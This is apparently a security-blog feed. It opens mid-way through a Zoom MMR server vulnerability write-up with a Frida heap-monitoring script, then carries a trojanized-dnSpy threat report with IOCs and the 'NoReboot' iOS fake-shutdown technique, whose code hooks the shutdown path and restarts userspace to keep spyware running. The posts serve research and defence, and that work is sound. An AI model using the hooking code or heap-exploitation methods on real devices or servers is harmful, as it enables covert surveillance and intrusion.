Looking at the code for the MMR server, I noticed that ssb::conf_send_msg_req::load_from, the class the vulnerability occurs in was also present on the MMR server. Since the MMR forwards Zoom meeting traffic from one client to another, it makes sense that it might also deserialize this packet type. I analyzed the MMR code in IDA, and found that deserialization of this class only occurs during Zoom Webinars. I purchased a Zoom Webinar license, and was able to crash my own Zoom MMR server by sending this packet. I was not willing to test a vulnerability of this type on Zoom’s public MMR servers, but it seems reasonably likely that the same code was also in Zoom’s public servers.

Looking further at deserialization, I noticed that all deserialized objects contain an optional field of type ssb::dyna_para_table_t, which is basically a properties table that allows a map of name strings to variant objects to be included in the deserialized object. The variants in the table are implemented by the structure ssb::variant_t, as follows.

struct variant{
    char type;
    short length;
    var_data data;
};

union var_data{
    char i8;
    char* i8_ptr;
    short i16;
    short* i16_ptr;
    int i32;
    int* i32_ptr;
    long long i64;
    long long* i64_ptr;
};

The value of the type field corresponds to the width of the variant data (1 for 8-bit, 2 for 16-bit, 3 for 32-bit and 4 for 64-bit). The length field specifies whether the variant is an array and its length. If it has the value 0, the variant is not an array, and a numeric value is read from the data field based on its type. If the length field has any other value, the data field is cast to a pointer and an array of that size is read.

My immediate concern with this implementation was that it could be prone to type confusion. One possibility is that a numeric value could be confused with an array pointer, which would allow an attacker to create a variant with a pointer that they specify. However, both the client and MMR perform very aggressive type checks on variants they treat as arrays. Another possibility is that a pointer could be confused with a numeric value. This could allow an attacker to determine the address of a buffer they control if the value is ever returned to the attacker. I found a few locations in the MMR code where a pointer is converted to a numeric value in this way and logged, but nowhere that an attacker could obtain the incorrectly cast value. Finally, I looked at how array data is handled, and I found that there are several locations where byte array variants are converted to strings, however not all of them checked that the byte array has a null terminator. This meant that if these variants were converted to strings, the string could contain the contents of uninitialized memory.

Most of the time, packets sent to the MMR by one user are immediately forwarded to other users without being deserialized by the server. For some bugs, this is a useful feature, for example, it is what allows CVE-2021-34423 discussed earlier to be triggered on a client. However, an information leak in variants needs to occur on the server to be useful to an attacker. When a client deserializes an incoming packet, it is for use on the device, so even if a deserialized string contains sensitive information, it is unlikely that this information will be transmitted off the device. Meanwhile, the MMR exists expressly to transmit information from one user to another, so if a string gets deserialized, there is a reasonable chance that it gets sent to another user, or alters server behavior in an observable way. So, I tried to find a way to get the server to deserialize a variant and convert it to a string. I eventually figured out that when a user logs into Zoom in a browser, the browser can’t process serialized packets, so the MMR must convert them to strings so they can be accessed through web requests. Indeed, I found that if I removed the null terminator from the user_name variant, it would be converted to a string and sent to the browser as the user’s display name.

The vulnerability was assigned CVE-2021-34424 and fixed on November 24, 2021. I tested it on my own MMR as well as Zoom’s public MMR, and it worked and returned pointer data in both cases.

Exploit Attempt

I attempted to exploit my local MMR server with these vulnerabilities, and while I had success with portions of the exploit, I was not able to get it working. I started off by investigating the possibility of creating a client that could trigger each bug outside of the Zoom client, but client authentication appeared complex and I lacked symbols for this part of the code, so I didn’t pursue this as I suspected it would be very time-consuming. Instead, I analyzed the exploitability of the bugs by triggering them from a Linux Zoom client hooked with Frida.

I started off by investigating the impact of heap corruption on the MMR process. MMR servers run on CentOS 7, which uses a modern glibc heap, so exploiting heap unlinking did not seem promising. I looked into overwriting the vtable of a C++ object allocated on the heap instead.


I wrote several Frida scripts that hooked malloc on the server, and used them to monitor how incoming traffic affects allocation. It turned out that there are not many ways for an attacker to control memory allocation on an MMR server that are useful for exploiting this vulnerability. There are several packet types that an attacker can send to the server that cause memory to be allocated on the heap and then freed when processing is finished, but not as many where the attacker can trigger both allocation and freeing. Moreover, the MMR server performs different types of processing in separate threads that use unique heap arenas, so many areas of the code where this type of allocation is likely to occur, such as connection management, allocate memory in a different heap arena than the thread where the bug occurs. The only such allocations I could find that were made in the same arena were related to meeting set-up: when a user joins a meeting, certain objects are allocated on the heap, which are then freed when they leave the meeting. Unfortunately, these allocations are difficult to automate as they require many unique user accounts in order for the allocation to be performed repeatedly, and allocation takes an observable amount of time (seconds).
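A simplified sketch of such a monitoring script (the size filter and output format are illustrative):

// Track allocations and frees on the MMR process to see which packets drive heap activity
Interceptor.attach(Module.getExportByName(null, "malloc"), {
    onEnter: function (args) {
        this.size = args[0].toInt32();
    },
    onLeave: function (retval) {
        if (this.size > 0 && this.size < 0x100) {   // focus on small, fastbin-sized chunks
            console.log("malloc(" + this.size + ") = " + retval);
        }
    }
});

Interceptor.attach(Module.getExportByName(null, "free"), {
    onEnter: function (args) {
        console.log("free(" + args[0] + ")");
    }
});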

I eventually wrote Frida scripts that looked for free chunks of unusual sizes that bordered C++ objects with vtables during normal MMR operation. There were a few allocation sizes that met this criteria, and since CVE-2021-34423 allows for the size of the buffer that is overflowed to be specified by the attacker, I was able to corrupt the memory of the adjacent object. Unfortunately, heap verification was very robust, so in most cases, the MMR process would crash due to a heap verification error before a virtual call was made on the corrupted object. I eventually got around this by focusing on allocation sizes that are small enough to be stored in fastbins by the heap, as heap chunks that are stored in fastbins do not contain verifiable heap metadata. Chunks of size 58 turned out to be the best choice, and by triggering the bug with an allocation of that size, I was able to control the pointer of a virtual call about one in ten times I triggered the bug.

The next step was to figure out where to point the pointer I could control, and this turned out to be more challenging than I expected. The MMR process did not have ASLR enabled when I did this research (it was enabled in version 4.6.20211128.136, which was released on November 28, 2021), so I was hoping to find a series of locations in the binary that this call could be directed to that would eventually end in a call to execv with controllable parameters, as the MMR initialization code contains many calls to this function. However, there were a few features of the server that made this difficult. First, only the MMR binary was loaded at a fixed location. The heap and system libraries were not, so only the actual MMR code was available without bypassing ASLR. Second, if the MMR crashes, it has an exponential backoff which culminates in it respawning every hour on the hour. This limits how many exploit attempts an attacker has. It is realistic that an attacker might spend days or even weeks trying to exploit a server, but this still limits them to hundreds of attempts. This means that any exploit of an MMR server would need to be at least somewhat reliable, so certain techniques that require a lot of attempts, such as allocating a large buffer on the heap and trying to guess its location were not practical.

I eventually decided that it would be helpful to allocate a buffer on the heap with controlled contents and determine its location. This would make the exploit fairly reliable in the case that the overflow successfully leads to a virtual call, as the buffer could be used as a fake vtable, and also contain strings that could be used as parameters to execv. I tried using CVE-2021-34424 to leak such an address, but wasn’t able to get this working.

This bug allows the attacker to provide a string of any size, which then gets copied out of bounds up until a null character is encountered in memory, and then returned. It is possible for CVE-2021-34424 to return a heap pointer, as the MMR maps the heap that gets corrupted at a low address that does not usually contain null bytes, however, I could not find a way to force a specific heap pointer to be allocated next to the string buffer that gets copied out of bounds. C++ objects used by the MMR tend to be virtual objects, so the first 64 bits of most object allocations are a vtable which contains null bytes, ending the copy. Other allocated structures, especially larger ones, tend to contain non-pointer data. I was able to get this bug to return heap pointers by specifying a string that was less than 64 bits long, so the nearby allocations were sometimes the pointers themselves, but allocations of this size are so frequent it was not possible to ascertain what heap data they pointed to with any accuracy.

One last idea I had was to use another type confusion bug to leak a pointer to a controllable buffer. There is one such bug in the processing of deserialized ssb::kv_update_req objects. This object’s ssb::dyna_para_table_t table contains a variant named nodeid which represents the specific Zoom client that the message refers to. If an attacker changes this variant to be of type array instead of a 32-bit integer, the address of the pointer to this array will be logged as a string. I tried to combine CVE-2021-34424 with this bug, hoping that it might be possible for the leaked data to be this log string that contains pointer information. Unfortunately, I wasn’t able to get this to work because of timing: the log entry needs to be logged at almost exactly the same time as the bug is triggered so that the log data is still in memory, and I wasn't able to send packets fast enough. I suspect it might be possible for this to work with improved automation, as I was relying on clients hooked with Frida and browsers to interact with the Zoom server, but I decided not to pursue this as it would require tooling that would take substantial effort to develop.

Conclusion

I performed a security analysis of Zoom and reported two vulnerabilities. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

The vulnerabilities in Zoom’s MMR server are especially concerning, as this server processes meeting audio and video content, so a compromise could allow an attacker to monitor any Zoom meetings that do not have end-to-end encryption enabled. While I was not successful in exploiting these vulnerabilities, I was able to use them to perform many elements of exploitation, and I believe that an attacker would be able to exploit them with sufficient investment. The lack of ASLR in the Zoom MMR process greatly increased the risk that an attacker could compromise it, and it is positive that Zoom has recently enabled it. That said, if vulnerabilities similar to the ones that I reported still exist in the MMR server, it is likely that an attacker could bypass it, so it is also important that Zoom continue to improve the robustness of the MMR code.

It is also important to note that this research was possible because Zoom allows customers to set up their own servers, meanwhile no other video conferencing solution with proprietary servers that I have investigated allows this, so it is unclear how these results compare to other video conferencing platforms.

Overall, while the client bugs that were discovered during this research were comparable to what Project Zero has found in other videoconferencing platforms, the server bugs were surprising, especially when the server lacked ASLR and supports modes of operation that are not end-to-end encrypted.

There are a few factors that commonly lead to security problems in videoconferencing applications that contributed to these bugs in Zoom. One is the huge amount of code included in Zoom. There were large portions of code that I couldn’t determine the functionality of, and many of the classes that could be deserialized didn’t appear to be commonly used. This both increases the difficulty of security research and increases the attack surface by making more code that could potentially contain vulnerabilities available to attackers. In addition, Zoom uses many proprietary formats and protocols which meant that understanding the attack surface of the platform and creating the tooling to manipulate specific interfaces was very time consuming. Using the features we tested also required paying roughly $1500 USD in licensing fees. These barriers to security research likely mean that Zoom is not investigated as often as it could be, potentially leading to simple bugs going undiscovered.  

Still, my largest concern in this assessment was the lack of ASLR in the Zoom MMR server. ASLR is arguably the most important mitigation in preventing exploitation of memory corruption, and most other mitigations rely on it on some level to be effective. There is no good reason for it to be disabled in the vast majority of software. There has recently been a push to reduce the susceptibility of software to memory corruption vulnerabilities by moving to memory-safe languages and implementing enhanced memory mitigations, but this relies on vendors using the security measures provided by the platforms they write software for. All software written for platforms that support ASLR should have it (and other basic memory mitigations) enabled.

The closed nature of Zoom also impacted this analysis greatly. Most video conferencing systems use open-source software, either WebRTC or PJSIP. While these platforms are not free of problems, it’s easier for researchers, customers and vendors alike to verify their security properties and understand the risk they present because they are open. Closed-source software presents unique security challenges, and Zoom could do more to make their platform accessible to security researchers and others who wish to evaluate it. While the Zoom Security Team helped me access and configure server software, it is not clear that support is available to other researchers, and licensing the software was still expensive. Zoom, and other companies that produce closed-source security-sensitive software should consider how to make their software accessible to security researchers.

Planned Upcoming Classes

15 January 2022 at 09:38

Some people asked me if I had a schedule of trainings I plan to do in the coming months. Well, here it is. At this point I would like to gauge interest, and plan the course hours (time zone) to accommodate the majority of participants.

I am moving to classes that are partly full days and partly half days. The full day sessions are going to be recorded for the participants (so that if anyone misses something because of urgent work, inconvenient time zone, etc., the recording should help). The half days are not recorded, and should be easier to handle, since they are only about 4 hours long.

Here is the planned course list with dates (f=full day, all others are half-days). The cost is in USD (paid by individual / paid by a company):

  • COM Programming with C++ (3 days): April 25, 26, 27, 28, May 2, 3 (Cost: 700/1300)
  • Windows System Programming (5 days): May 16 (f), 17, 18, 19, 23 (f), 24, 25, 26 (Cost: 800/1500)
  • Windows Kernel Programming (4 days): June 6 (f), 8, 9, 13 (f), 14 (Cost: 800/1500)
  • Windows Internals (5 days): July 11 (f), 12, 13, 14, 18 (f), 19, 20, 21 (Cost: 800/1500)
  • Advanced Kernel Programming (New!) (4 days): September 12 (f), 13, 14, 15, 19, 20, 21 (Cost: 800/1500)

“Advanced Kernel Programming” is a new class I’m planning, suitable for those who participated in “Windows Kernel Programming” (or have equivalent knowledge). This course will cover file system mini-filters, NDIS filters, and the Windows Filtering Platform (WFP), along with other advanced programming techniques.

I may add more classes after September, but it’s too far from now to make such a commitment.

If you are interested in one or more of these classes, please write an email to [email protected], and provide your name, preferred contact email, and your time zone. This is not a commitment on your part; you may change your mind later on. It should, however, reflect genuine interest, with dates and topics that work for you.

Also, if you have other classes you would be happy if I deliver, you are welcome to suggest them. No promises, of course, but if there is enough interest, I will consider creating and delivering them.

If you’d like a private class for your team, get in touch. Syllabi can be customized as needed.

Have a great year ahead!


Malware Analysis: Ragnarok Ransomware

By: voidsec
28 April 2021 at 08:13

The analysed sample is a malware employed by the Threat Actor known as Ragnarok. The ransomware is responsible for encrypting files and is typically executed by the actors themselves on the compromised machines. The name of the analysed executable is xs_high.exe, but others have been found used by the same ransomware family (such as […]

The post Malware Analysis: Ragnarok Ransomware appeared first on VoidSec.

Fake dnSpy - When Even Hackers Don't Play Fair

By: liuchuang
12 January 2022 at 13:06

Background

dnSpy is a popular tool for debugging, modifying, and decompiling .NET programs. Security researchers frequently use it when analyzing .NET programs and malware.

On January 8, 2022, BLEEPING COMPUTER reported that attackers had launched a campaign against security researchers and developers using a malicious build of dnSpy. @MalwareHunterTeam published tweets disclosing the GitHub repositories distributing the malicious dnSpy build, which goes on to install a clipboard hijacker, Quasar RAT, a cryptominer, and more.

Looking at the official dnSpy Git repository, we can see that the tool is in an Archived state: it stopped receiving updates back in 2020 and has no official website.

The attackers took advantage of exactly this by registering the dnspy[.]net domain and building a very polished website to distribute the malicious dnSpy program.

They also bought Google search ads to push the site to the top of the search results and widen its reach.

As of January 9, 2022, the website has been taken offline.

Sample Analysis

The build delivered from dnspy[.]net is a modified version of dnSpy 6.1.8, which is also the last version released officially.

The infection is carried out by modifying the entry-point code of dnSpy.dll, one of dnSpy's core modules.

Compared with the normal entry function of dnSpy.dll, the modified entry point adds an executable that is loaded directly in memory.

That program is named dnSpy Reader, and it is obfuscated.

It subsequently uses mshta to deliver cryptominers, a clipboard hijacker, RATs, and more.

Github

The attackers created two GitHub repositories:

  • https[:]//github[.]com/carbonblackz/dnSpy
  • https[:]//github[.]com/isharpdev/dnSpy

The usernames used are isharpdev and carbonblackz; remember that second name, because we will see it again shortly.

Pivoting on the Infrastructure

Analyzing dnspy[.]net revealed some interesting traces that allowed us to pivot onto more of the attacker's infrastructure:

dnspy.net

The domain dnspy[.]net was registered on April 14, 2021.

The domain has several resolution records, most of them pointing to Cloudflare CDN services. However, when reviewing the historical resolution records, we found that between December 13 and January 3 the domain resolved to 45.32.253[.]0. Unlike the Cloudflare CDN IPs, this address has only a small number of mapped domains.

Querying the passive DNS (PDNS) records for this IP shows that most of the domains mapped to it appear to be impersonation domains, and most of them are already offline.

Some of these domains are download sites for hacking tools, office software and the like, and all of them appear to impersonate legitimate websites.

Together with the dnspy[.]net domain from the disclosed incident, this behavior pattern makes us suspect that all of these domains are assets owned by the same attacker, so we analyzed them further.

Analysis of Related Domains

Take toolbase[.]co as an example. This domain was historically a hacking tool download site, and the unpacking password for the tools on its homepage is "CarbonBlackz", the same name as one of the GitHub users who uploaded the malicious dnSpy.

The site's page title was later changed to Combolist-Cloud, matching the combolist.cloud domain present in the resolution records of 45.32.253[.]0; some of its files are distributed via mediafire or gofile.

The domain appears to be an imitation of combolist[.]top, a forum that offers leaked data.

torfiles[.]net is likewise a software download site.

Windows-software[.]co and windows-softeware[.]net are download sites built from the same template.

shortbase[.]net has the same CyberPanel installation page as dnspy[.]net, and both are dated December 19, 2021.

The Wayback Machine record of dnspy[.]net shows the same historical CyberPanel installation page.

coolmint[.]net is another download site, still reachable as of January 12, 2022, but its download links merely redirect to mega[.]nz.

filesr[.]net and toolbase[.]co use the same template; the site's About Us page was not even modified, and its content was adapted from the About Us page of FileCR[.]com.

The software on filesr[.]net is distributed via Dropbox, but all of the current links are dead.

Finally, zippyfiles[.]net is another hacking tool download site.

We also found a Reddit user named tuki1986 who had spent the previous two months promoting the toolbase[.]co and zippyfiles[.]net sites.

A year earlier, the same user was promoting bigwarez[.]net.

That site's history shows it was also a tool download site, with several associated social media accounts:

Twitter: @Bigwarez2

Facebook: @software.download.free.mana

This account is now promoting itools[.]digital, a download site for browser extensions.

Facebook group: @free.software.bigwarez

LinkedIn (no longer accessible): @free-software-1055261b9

Tumblr: @bigwarez

Digging further into tuki1986's history turned up another website, blackos[.]net.

This site is also a hacking tool download site, and it is flagged on threat intelligence platforms as hosting backdoored software.

Through this website we found a user named sadoutlook1992, who has been posting trojanized hacking tools on various hacking forums since 2018.

In their most recent activity, the download links point to zippyfiles[.]net.

From the malicious GitHub repositories and the archive password we already know the username "CarbonBlackz". Searching for this string turns up a user named "Carbonblackz" on the well-known data leak site raidforums[.]com.

The same name is also registered on a Russian-language cybercrime forum. Neither account has published any posts or replies, so they have probably not been put to use yet.

The actor has also posted software download links on Vietnam's largest forum.

Attribution

Looking at the WHOIS information for these domains, the contact email address for filesr[.]net is [email protected]

Searching for information tied to this mailbox links it to a 35-year-old individual, presumably from Russia.

Judging from the two IDs carbon1986 and tuki1986, 1986 is likely the actor's year of birth, which is consistent with an age of 35.

Based on the connections between these domains and their shared behavior patterns and promotion methods, we believe they belong to the same group as the dnspy[.]net attackers.

This is a carefully constructed malicious operation that has been active since at least October 2018. It registers large numbers of websites offering trojanized hacking tools and cracked software for download and promotes them on multiple social media platforms, infecting hackers, security researchers, software developers and other users, and then carrying out malicious activities such as cryptomining, stealing cryptocurrency, or stealing data via RAT software.

Conclusion

Trojanized cracked software is nothing new, but attacks aimed at security researchers are more likely to succeed: the sensitive behavior of hacking and analysis tools is easily flagged by antivirus products, so some researchers turn their antivirus software off to avoid the constant warnings.

Although most of the malicious websites, GitHub repositories, and malware distribution links tied to this group are now dead, security researchers and developers should stay vigilant. Cracked or leaked hacking tools are best run only inside a virtual environment, and development and office software should be downloaded from official websites or other legitimate channels, preferably as genuine licensed copies, to avoid unnecessary losses.

IOCs

dnSpy.dll - f00e0affede6e0a533fd0f4f6c71264d

  • ip
45.32.253.0

  • domain
zippyfiles.net
windows-software.net
filesr.net
coolmint.net
windows-software.co
dnspy.net
torfiles.net
combolist.cloud
toolbase.co
shortbase.net
blackos.net
bigwarez.net
buysixes.com
itools.digital
4api.net

Persistence without “Persistence”: Meet The Ultimate Persistence Bug – “NoReboot”

4 January 2022 at 20:49

Mobile Attacker’s Mindset Series – Part II

Evaluating how attackers operate when there are no rules leads to discoveries of advanced detection and response mechanisms. ZecOps is proudly researching scenarios of attacks and sharing the information publicly for the benefit of all the mobile defenders out there.

iOS persistence is presumed to be the hardest bug to find. The attack surface is somewhat limited and constantly analyzed by Apple's security teams.

Creativity is a key element of the hacker's mindset. Persistence can be hard if the attackers play by the rules. As you may have guessed already, attackers do not play by the rules, and everything is possible.

In part II of the Attacker’s Mindset blog we’ll go over the ultimate persistence bug: a bug that cannot be patched because it’s not exploiting any persistence bugs at all – only playing tricks with the human mind.

Meet “NoReboot”: The Ultimate Persistence Bug

We’ll dissect the iOS system and show how it’s possible to alter a shutdown event, tricking a user that got infected into thinking that the phone has been powered off, but in fact, it’s still running. The “NoReboot” approach simulates a real shutdown. The user cannot feel a difference between a real shutdown and a “fake shutdown”. There is no user-interface or any button feedback until the user turns the phone back “on”.

To demonstrate this technique, we'll show the remote microphone & camera being accessed after "turning off" the phone, and "persisting" when the phone is brought back to a "powered on" state.

This blog can also be an excellent tutorial for anyone who may be interested in learning how to reverse engineer iOS.

Nowadays, many of us have tons of applications installed on our phones, and it is difficult to determine which among them is abusing our data and privacy. Our information is constantly being collected and uploaded.

This story by Dan Goodin describes iOS malware discovered in the wild. One of the sentences in the article says: “The installed malware…can’t persist after a device reboot, … phones are disinfected as soon as they’re restarted.”.

The reality is actually a bit more complicated than that. As we will be able to demonstrate in this blog, we cannot, and should not, trust a “normal reboot”.

How Are We Supposed to Reboot iPhones?

According to Apple, a phone is rebooted by pressing the Volume Down and Power buttons and dragging the slider.

Given that the iPhone has no internal fan and typically stays cool, it's not trivial to tell whether the phone is running or not. For end-users, the most intuitive indicator that the phone is on is the feedback from the screen. We tap on the screen or click the side button to wake up the screen.

Here is a list of physical feedback that constantly reminds us that the phone is powered on:

  • Ring/Sound from incoming calls and notifications
  • Touch feedback (3D touch)
  • Vibration (silent mode switch triggers a burst of vibration)
  • Screen
  • Camera indicator

“NoReboot”: Hijacking the Shutdown Event

Let’s see if we can disable all of the indicators above while keeping the phone with the trojan still running. Let’s start by hijacking the shutdown event, which involves injecting code into three daemons.

When you slide to power off, it is actually a system application /Applications/InCallService.app sending a shutdown signal to SpringBoard, which is a daemon that is responsible for the majority of the UI interaction.

We managed to hijack the signal by hooking the Objective-C method -[FBSSystemService shutdownWithOptions:]. Now instead of sending a shutdown signal to SpringBoard, it will notify both SpringBoard and backboardd to trigger the code we injected into them.
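The post does not include the hook itself, so purely as an illustration, here is what such a swizzle could look like when written in C against the Objective-C runtime and compiled into a dylib injected into the process that calls -[FBSSystemService shutdownWithOptions:] (InCallService, per the post). The class and selector names come from the post; the notification name, method signature, and everything else are assumptions, not ZecOps' actual PoC.

    /* Minimal sketch: swallow the real shutdown request and signal our own
     * code in SpringBoard/backboardd instead. */
    #include <objc/runtime.h>
    #include <notify.h>          /* Darwin notifications, used here as an
                                    assumed signalling channel */

    static IMP g_orig_shutdown;  /* kept in case the original ever needs to run */

    /* Replacement implementation: never forwards the real shutdown. */
    static void fake_shutdownWithOptions(id self, SEL _cmd, id options)
    {
        (void)self; (void)_cmd; (void)options; (void)g_orig_shutdown;
        notify_post("com.example.fakeshutdown");   /* hypothetical channel */
    }

    __attribute__((constructor))
    static void install_hook(void)
    {
        Class cls = objc_getClass("FBSSystemService");
        if (!cls) return;
        Method m = class_getInstanceMethod(cls,
                       sel_registerName("shutdownWithOptions:"));
        if (!m) return;
        g_orig_shutdown = method_setImplementation(m, (IMP)fake_shutdownWithOptions);
    }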

In backboardd, we will hide the spinning wheel animation that automatically appears when SpringBoard stops running; the magic spell that does this is [[BKSDefaults localDefaults] setHideAppleLogoOnLaunch:1]. Then we make SpringBoard exit and block it from launching again. Because SpringBoard is responsible for responding to user behavior and interaction, without it the device looks and feels as if it is not powered on, which is the perfect disguise for mimicking a fake power-off.
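The backboardd side boils down to that single call. As a sketch only, the same call can be issued from plain C through the Objective-C runtime; the class and selector are taken from the post, while the surrounding function is illustrative.

    /* Sketch (assumed to run in code injected into backboardd):
     * [[BKSDefaults localDefaults] setHideAppleLogoOnLaunch:1] */
    #include <objc/runtime.h>
    #include <objc/message.h>

    static void hide_shutdown_spinner(void)
    {
        Class bksDefaults = objc_getClass("BKSDefaults");
        if (!bksDefaults) return;

        /* id defaults = [BKSDefaults localDefaults]; */
        id defaults = ((id (*)(Class, SEL))objc_msgSend)(
            bksDefaults, sel_registerName("localDefaults"));
        if (!defaults) return;

        /* [defaults setHideAppleLogoOnLaunch:1]; */
        ((void (*)(id, SEL, BOOL))objc_msgSend)(
            defaults, sel_registerName("setHideAppleLogoOnLaunch:"), 1);
    }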

Example of SpringBoard responding to user interaction: detecting a long press and invoking Siri.

Even though we disabled all physical feedback, the phone remains fully functional and maintains an active internet connection. The malicious actor can remotely manipulate the phone in a blatant way without worrying about being caught, because the user is tricked into thinking the phone is off, whether it was "turned off" by the victim or by the malicious actors using "low battery" as an excuse.

Later we will demonstrate eavesdropping through cam & mic while the phone is “off”. In reality, malicious actors can do anything the end-user can do and more. 

System Boot In Disguise

Now the user wants to turn the phone back on. Seeing the familiar system boot animation with the Apple logo convinces the end-user that the phone really had been turned off.

When SpringBoard is not on duty, backboardd is in charge of the screen. The description of backboardd we found on theiphonewiki states:

Ref: https://www.theiphonewiki.com/wiki/Backboardd

“All touch events are first processed by this daemon, then translated and relayed to the iOS application in the foreground”. We found this statement to be accurate. Moreover, backboardd relays not only touch events but also physical button click events.

backboardd logs the exact time when a button is pressed down and when it is released.

With help from cycript, we found a way to intercept that event using Objective-C method hooking.

A _BKButtonEventRecord instance is created and inserted into a global dictionary object, BKEventSenderUsagePairDictionary. We hook the insertion method to detect when the user attempts to “turn on” the phone.

The hook then unleashes SpringBoard and triggers a special code block in our injected dylib. This code leverages local SSH access to gain root privileges and then executes /bin/launchctl reboot userspace. This exits all processes and restarts the system without touching the kernel, which remains patched; hence malicious code has no problem continuing to run after this kind of reboot.
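A compressed sketch of that trigger, under the same caveats as above (root access via local SSH and code injection are assumed; the helper below is illustrative, not the PoC's code):

    /* Once the hooked insertion into BKEventSenderUsagePairDictionary shows
     * the user pressing the power button, restart userspace only, leaving
     * the still-patched kernel untouched. Requires root. */
    #include <stdlib.h>

    static void fake_boot_after_power_button(void)
    {
        /* Exits every userland process and restarts the system UI; the user
         * sees what looks like a normal boot with the Apple logo. */
        system("/bin/launchctl reboot userspace");
    }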

The user will see the Apple logo boot effect upon restarting, which is handled by backboardd as well. Once SpringBoard launches, backboardd lets it take over the screen.

From that point, the interactive UI will be presented to the user. Everything feels right as all processes have indeed been restarted. Non-persistent threats achieved “persistency” without persistence exploits.

Hijacking the Force Restart Event?

A user can perform a “force restart” by clicking rapidly on “Volume Up”, then “Volume Down”, then long press on the power button until the Apple logo appears.

We have not found an easy way to hijack the force-restart event; it is implemented at a much lower level. According to the post below, it is done at the hardware level. A brief search in the iOS kernel did not reveal what triggers the force-restart event. The good news is that this makes it harder for malicious actors to disable force restarts; at the same time, end-users face a risk of data loss, as the system does not have enough time to safely write data to disk during a force restart.

Misleading Force Restart

Nevertheless, it is entirely possible for malicious actors to observe the user's attempt to perform a force restart (via backboardd) and deliberately make the Apple logo appear a few seconds earlier, deceiving the user into releasing the buttons sooner than intended. In that case, the end-user has not actually triggered a force restart. We will leave this as an exercise for the reader.

Ref: https://support.apple.com/guide/iphone/force-restart-iphone-iph8903c3ee6/ios

NoReboot Proof of Concept

You can find the source code of NoReboot POC here.

Never trust a device to be off

Since iOS 15, Apple has included a feature allowing users to track their phone even when it is turned off. Malware researcher @naehrdine wrote a technical analysis of this feature and shared her opinion on its “Security and privacy impact”. We agree with her: “Never trust a device to be off, until you removed its battery or even better put it into a Blender.”

Checking if your phone is compromised

ZecOps for Mobile leverages extended data collection and enables responding to security events. If you’d like to inspect your phone – please feel free to request a free trial here.

2Q21: New Year's Reflections

31 December 2021 at 10:24

This may be the most important proposition revealed by history: “At the time, no one knew what was coming.”

― Haruki Murakami, 1Q84

1Q84 sat on my shelf gathering dust for years after I bought it during a wildly-ambitious Amazon shopping spree. I promised myself that I would get round to reading it, but college offered far more immediate distractions.

I only started reading it in 2020, when a new phase of life – my first job! – triggered a burst of enthusiasm for fresh beginnings. I moved at a brisk pace, savouring Murakami’s knack for magical prose and weird similes (“His voice was hard and dry, reminding her of a desert plant that could survive a whole year on one day’s worth of rain.”) However, as a mysterious new virus crept, then leapt across the globe, I found myself slowing down. The fantastical plot filled with Little People and Air Chrysalises and two moons began to take on a degree of verisimilitude that pulled me out of the story.

Two-thirds into the book, one of the characters, a woman/fitness instructor/assassin named Aomame, isolates herself in a small apartment for months due to reasons outside of her control. Unable to even take a single step outside, she kills time by reading Proust (In Search of Lost Time), listening to the radio, and working out. She’s lost, trying to find her way back to a sense of normalcy. It felt too real; although I only had about a hundred pages left, I put the book back on the shelf.

The most-read New York Times story in 2021 labelled the pervasive sense of ennui as “languishing” – the indeterminable void between depression and flourishing. To combat this, it suggested rediscovering one’s “flow”.

I set three big learning goals for myself this year: artificial intelligence, vulnerability research, and Internet of Things.

I was lucky enough to snag an OpenAI GPT-3 beta invitation, and the tinkering that ensued eventually resulted in AI-powered phishing research that I presented with my colleagues at DEF CON and Black Hat USA. WIRED magazine covered the project in thankfully fairly nuanced terms.

In the meantime, I cut my teeth on basic exploitation with Offensive Security's Exploit Developer course, which I then applied in my own research to discover fresh Apache OpenOffice and Microsoft Office code execution bugs (The Register reported on my related HacktivityCon talk). Dipping my toes into vulnerability research reminded me just how vast this ocean is; it'll be a long time before I can even tread water.

Finally, I trained with my colleagues in beginner IoT/OT concepts, winning the DEF CON ICS CTF. One thing I noticed about this space is the lack of good online trainings (even the in-person ones are iffy); there’s a niche market opportunity here. My vulnerability research team discovered 8 new vulnerabilities in Synology’s Network Attached Storage devices in a (failed) bid for Pwn2Own glory. Still, I made some lemonade with an upcoming talk at ShmooCon on why no one pwned Synology at Pwn2Own and TianFu Cup. Spoiler: it’s not because Synology is unhackable.

I finished 1Q84 last week. At the end of the book, Aomame escapes the dangerous alternate dimension she’s trapped in by entering yet another dimension – sadly, there’s no way home, as Spiderman will tell you. I suspect that “same same but different” feeling will carry over to 2022 – even as we emerge from the great crisis, there will be no homecoming. We will have to deal with the strange new world we have stumbled into.

Whichever dimension we may be in, here’s wishing you and your loved ones a very happy new year.

Analysis of a VMWare Guest-to-Host Escape from Pwn2Own 2017

This vulnerability was found by Keen Security Lab, who demonstrated it at Pwn2Own 2017. Unfortunately, because the bug was silently patched by VMWare in 12.5.3, no CVE number was assigned, even though the vulnerability leads to remote code execution. Summary The vulnerability affects the Drag n Drop functionality of VMWare Workstation Pro before 12.5.3. This feature allows users to copy files from the host to the guest. However, due to a few insecure backdoor calls over an RPC interface, a Use-After-Free is present.

Supervisor Mode Execution Prevention

Supervisor Mode Execution Prevention is a CPU security feature which aims to prevent execution of untrusted memory while operating at a greater privilege level. In short, it prevents so-called “ring0” (kernelspace) code from executing code that resides in “ring3” (userspace) memory. History SMEP was first introduced in 2011 by Intel on the Ivy Bridge architecture. It was designed to address classes of Local Privilege Escalation (LPE), sometimes also known as Escalation of Privilege (EoP), attacks.

PaX - structleak

I am rather fascinated with exploit mitigations, especially ones by PaX. When I first started out in security I came to learn of PaX quite quickly, and since moving into the binary exploitation space my desire to understand how these mitigations are created and how they work has greatly increased. In light of that, today I am going to look into “STRUCTLEAK”. Introduction STRUCTLEAK is a GCC plugin created by the PaX team; their decision to make such a plugin was prompted by CVE-2013-2141 (more on this CVE shortly).

Setting up PwnDbg with Ghidra

25 September 2021 at 00:00
If you’re like me and more used to Windows tooling (even if you have Linux experience), it is a little difficult to set up some of this more complicated Rizin tooling. So I thought I would make a quick guide about setting up Pwndbg with Ghidra. As a WinDbg user, despite having used gdb before, I find it has a lot of quirks; quirks which are as easy to get used to as the ones that exist in WinDbg.

Automatic Reference Counting

19 September 2021 at 00:00
I was bored, so I decided to write a blog post on what “Automatic Reference Counting” (ARC) is and, more importantly, how it can act as a mitigation for Use-After-Free vulnerabilities, as well as other heap-based memory management bugs such as memory leaks. Introduction Most of you will probably have heard of garbage collection, most likely in the context of Java. Someone might have said to you before “Java garbage collection is horrible”.

